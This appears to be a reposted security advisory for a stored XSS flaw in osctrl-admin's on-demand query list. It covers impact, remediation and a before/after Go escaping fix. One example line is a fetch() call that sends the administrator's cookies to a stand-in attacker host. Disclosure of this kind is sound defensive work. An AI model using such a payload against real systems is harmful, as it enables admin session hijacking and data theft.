CVE-2026-28280: Stored Cross-Site Scripting (XSS) in osctrl-admin On-Demand Query List

Published: (February 27, 2026 at 09:40 PM EST)
2 min read
Source: Dev.to

Vulnerability Overview

  • Vulnerability ID: CVE-2026-28280
  • CWE ID: CWE‑79 (Improper Neutralization of Input During Web Page Generation)
  • CVSS v3.1 Base Score: 6.1 (Medium)
  • EPSS Score: 0.00023
  • Published: 2026‑02‑28
  • Attack Vector: Network

A stored cross‑site scripting (XSS) vulnerability exists in the osctrl‑admin component of osctrl versions prior to 0.5.0. An authenticated user who holds only the low‑privilege query permission can inject malicious JavaScript via the on‑demand query interface. The payload is stored in the backend database and later rendered in the administrative dashboard without context‑aware output encoding. When an administrator views the query history, the script executes in the administrator's browser and session, so a low‑privilege user can hijack the admin session or perform administrative actions, which is effectively a privilege escalation to admin.

Affected Versions

  • osctrl‑admin, all versions prior to 0.5.0: the on‑demand query interface accepts and stores arbitrary HTML tags and executable JavaScript payloads and renders them back unencoded.

Example of a malicious payload

fetch('https://attacker.example.com/steal?c='+document.cookie)

If saved as the text of a query, wrapped in a <script> tag or an equivalent HTML event‑handler attribute so that it lands in an executable context, the payload is stored unchanged and runs in the admin's browser when the query list is viewed, sending the administrator's cookies to the attacker‑controlled host. Note that document.cookie only exposes cookies that lack the HttpOnly flag; a script running in the admin's origin can still issue authenticated requests to the osctrl API through the browser regardless of that flag.

Mitigation in the source code

The fix introduces context‑aware output encoding for the query display. A simplified excerpt of the change is shown below. html.EscapeString is the right encoder only where the value lands in HTML text or a quoted attribute value; a value written into a <script> block or an event‑handler attribute needs JavaScript‑string encoding instead, which Go's html/template package applies automatically according to the surrounding context.

// Before (vulnerable)
fmt.Fprintf(w, "%s", query.Text)

// After (patched)
escaped := html.EscapeString(query.Text) // proper HTML escaping
fmt.Fprintf(w, "%s", escaped)

Impact

  • Confidentiality: High – the script runs in the administrator's session and can exfiltrate any data the admin UI exposes; document.cookie leaks only cookies not marked HttpOnly, but the script can also call the API with the administrator's credentials directly.
  • Integrity: High – attacker can manipulate the admin interface, perform administrative actions in the victim's session, or inject further malicious content.
  • Availability: Low – the vulnerability does not directly affect service uptime.

Note that the 6.1 base score listed above is the usual CVSS v3.1 score for XSS with low (partial) confidentiality and integrity impact; the High ratings here describe the worst case for the compromised administrator account rather than the scored vector.

Exploitability

  • Exploit Status: Proof‑of‑Concept (PoC) available.
  • Low‑privilege authenticated users can trigger the vulnerability without requiring additional privileges.

Remediation

  1. Upgrade to osctrl v0.5.0 or later.
  2. Pull the latest Docker images or binaries for osctrl v0.5.0 and redeploy the osctrl-admin service.
  3. Verify the fix by saving a query whose name or text contains HTML tags (e.g., <b>test</b>) and then viewing the query list. The tags should appear as literal text, not be rendered as bold or interpreted as HTML; repeat the check with a <script> tag to confirm nothing executes.

Additional hardening recommendations

  • Apply input validation on all user‑supplied data as defense in depth; validation alone does not replace output encoding, since legitimate osquery SQL can contain quotes and angle brackets that must be stored and displayed faithfully.
  • Enforce output encoding for any data rendered in HTML contexts.
  • Follow the principle of least privilege: restrict the query permission to only those users who truly need it.

References

  • GitHub Advisory: GHSA‑4rv8‑5cmm‑2r22
  • NVD Entry: Vulnerability details and analysis (link to NVD)
  • Vendor Advisory: (link to vendor advisory)
  • Full report for CVE‑2026‑28280 (available on the vendor’s website)